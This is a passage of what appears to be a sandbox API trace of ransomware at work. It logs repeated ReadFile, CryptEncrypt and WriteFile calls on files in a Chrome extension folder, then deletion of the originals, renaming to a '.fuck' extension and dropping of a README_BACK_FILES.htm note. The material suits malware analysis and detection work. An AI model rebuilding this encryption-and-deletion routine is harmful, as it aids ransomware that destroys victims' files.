Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.236] CryptEncrypt (in: hKey=0x2e7ef80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75bb0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75bb0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.236] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e75bb0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75bb0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.237] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.242] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.242] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.253] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.253] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.253] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.254] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.254] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.254] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.254] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.254] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.254] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.255] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.255] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.255] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.255] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.255] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.255] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.255] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.256] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.256] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.256] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.256] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.256] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.256] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.257] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.258] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x193, lpOverlapped=0x0) returned 1 [0264.258] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x193, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1a0) returned 1 [0264.258] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1a0, lpOverlapped=0x0) returned 1 [0264.258] CloseHandle (hObject=0x5d5c) returned 1 [0264.258] CloseHandle (hObject=0x5d60) returned 1 [0264.258] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), bFailIfExists=0) returned 1 [0264.261] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json", dwFileAttributes=0x0) returned 1 [0264.261] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.gsg")) returned 1 [0264.263] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.fuck")) returned 1 [0264.264] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0264.264] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.264] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.264] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.264] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0264.264] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\readme_back_files.htm")) returned 0xffffffff [0264.264] AreFileApisANSI () returned 1 [0264.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.265] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.266] GetFileType (hFile=0x5d64) returned 0x1 [0264.266] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.268] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.268] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0264.268] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.268] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.268] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.268] GetLastError () returned 0x0 [0264.268] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json")) returned 0x20 [0264.268] SetFileAttributesA 